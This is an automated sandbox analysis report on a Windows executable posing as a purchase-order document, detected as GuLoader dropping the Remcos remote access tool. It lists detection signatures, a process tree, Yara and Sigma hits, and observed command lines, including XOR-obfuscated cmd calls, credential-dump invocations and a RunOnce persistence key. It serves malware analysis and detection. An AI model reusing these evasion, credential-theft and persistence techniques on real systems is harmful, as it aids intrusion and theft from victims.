Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe

Overview

General Information

Sample name:PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe
Analysis ID:1432013
MD5:dbe4440d32dc0b20dee76c192587ab33
SHA1:d5c94559655c5fc5bc552fce62aad8673731a3bb
SHA256:8059dc704b71f1a978547729e4afdf62f0c834950758ca8bb6a25fa6fca0b03d
Infos:

Detection

GuLoader, Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
Deletes itself after installation
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Installs a global keyboard hook
Maps a DLL or memory area into another process
Mass process execution to delay analysis
Obfuscated command line found
Sample uses process hollowing technique
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Too many similar processes found
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe (PID: 2980 cmdline: "C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe" MD5: DBE4440D32DC0B20DEE76C192587AB33)
    • cmd.exe (PID: 7836 cmdline: cmd.exe /c set /a "250^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1444 cmdline: cmd.exe /c set /a "244^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6780 cmdline: cmd.exe /c set /a "227^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1264 cmdline: cmd.exe /c set /a "255^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6500 cmdline: cmd.exe /c set /a "244^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3776 cmdline: cmd.exe /c set /a "253^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6732 cmdline: cmd.exe /c set /a "130^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 928 cmdline: cmd.exe /c set /a "131^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4156 cmdline: cmd.exe /c set /a "139^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7600 cmdline: cmd.exe /c set /a "139^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1264 cmdline: cmd.exe /c set /a "242^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6500 cmdline: cmd.exe /c set /a "195^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7048 cmdline: cmd.exe /c set /a "212^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6216 cmdline: cmd.exe /c set /a "208^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5708 cmdline: cmd.exe /c set /a "197^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4156 cmdline: cmd.exe /c set /a "212^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5108 cmdline: cmd.exe /c set /a "247^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 192 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1084 cmdline: cmd.exe /c set /a "221^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5472 cmdline: cmd.exe /c set /a "212^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1952 cmdline: cmd.exe /c set /a "240^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3788 cmdline: cmd.exe /c set /a "153^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4156 cmdline: cmd.exe /c set /a "220^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5108 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7596 cmdline: cmd.exe /c set /a "195^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1520 cmdline: cmd.exe /c set /a "133^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2208 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5960 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4740 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2460 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 928 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7276 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3012 cmdline: cmd.exe /c set /a "201^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5680 cmdline: cmd.exe /c set /a "137^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3448 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7276 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6348 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1520 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4156 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4740 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6196 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 452 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7588 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3060 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 192 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5680 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1392 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6204 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7964 cmdline: cmd.exe /c set /a "193^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6456 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3776 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3012 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2700 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6940 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1640 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6192 cmdline: cmd.exe /c set /a "133^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7040 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6668 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3060 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6336 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4156 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6688 cmdline: cmd.exe /c set /a "201^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5108 cmdline: cmd.exe /c set /a "137^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6780 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe (PID: 7048 cmdline: "C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe" MD5: DBE4440D32DC0B20DEE76C192587AB33)
      • PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe (PID: 732 cmdline: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe /stext "C:\Users\user\AppData\Local\Temp\blnru" MD5: DBE4440D32DC0B20DEE76C192587AB33)
      • PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe (PID: 5748 cmdline: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe /stext "C:\Users\user\AppData\Local\Temp\dfsjvxzdl" MD5: DBE4440D32DC0B20DEE76C192587AB33)
      • PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe (PID: 452 cmdline: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe /stext "C:\Users\user\AppData\Local\Temp\ohfuvpkfznra" MD5: DBE4440D32DC0B20DEE76C192587AB33)
      • wscript.exe (PID: 2224 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\rrrsyhb.vbs" MD5: 4D780D8F77047EE1C65F747D9F63A1FE)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\kajsoiestc.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    00000005.00000002.56133826946.00000000008BC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
      00000087.00000003.59076000939.0000000005DF7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000087.00000003.59075843834.0000000005DF7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000005.00000002.56133826946.00000000008FB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
            00000005.00000002.56135197649.0000000008643000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
              Click to see the 3 entries

              System Summary

              barindex
              Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\weltervgter\Gutte.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, ProcessId: 7048, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Nomap
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\rrrsyhb.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\rrrsyhb.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe", ParentImage: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, ParentProcessId: 7048, ParentProcessName: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\rrrsyhb.vbs" , ProcessId: 2224, ProcessName: wscript.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\rrrsyhb.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\rrrsyhb.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe", ParentImage: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, ParentProcessId: 7048, ParentProcessName: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\rrrsyhb.vbs" , ProcessId: 2224, ProcessName: wscript.exe
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\rrrsyhb.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\rrrsyhb.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe", ParentImage: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, ParentProcessId: 7048, ParentProcessName: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\rrrsyhb.vbs" , ProcessId: 2224, ProcessName: wscript.exe
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\weltervgter\Gutte.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, ProcessId: 7048, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Nomap
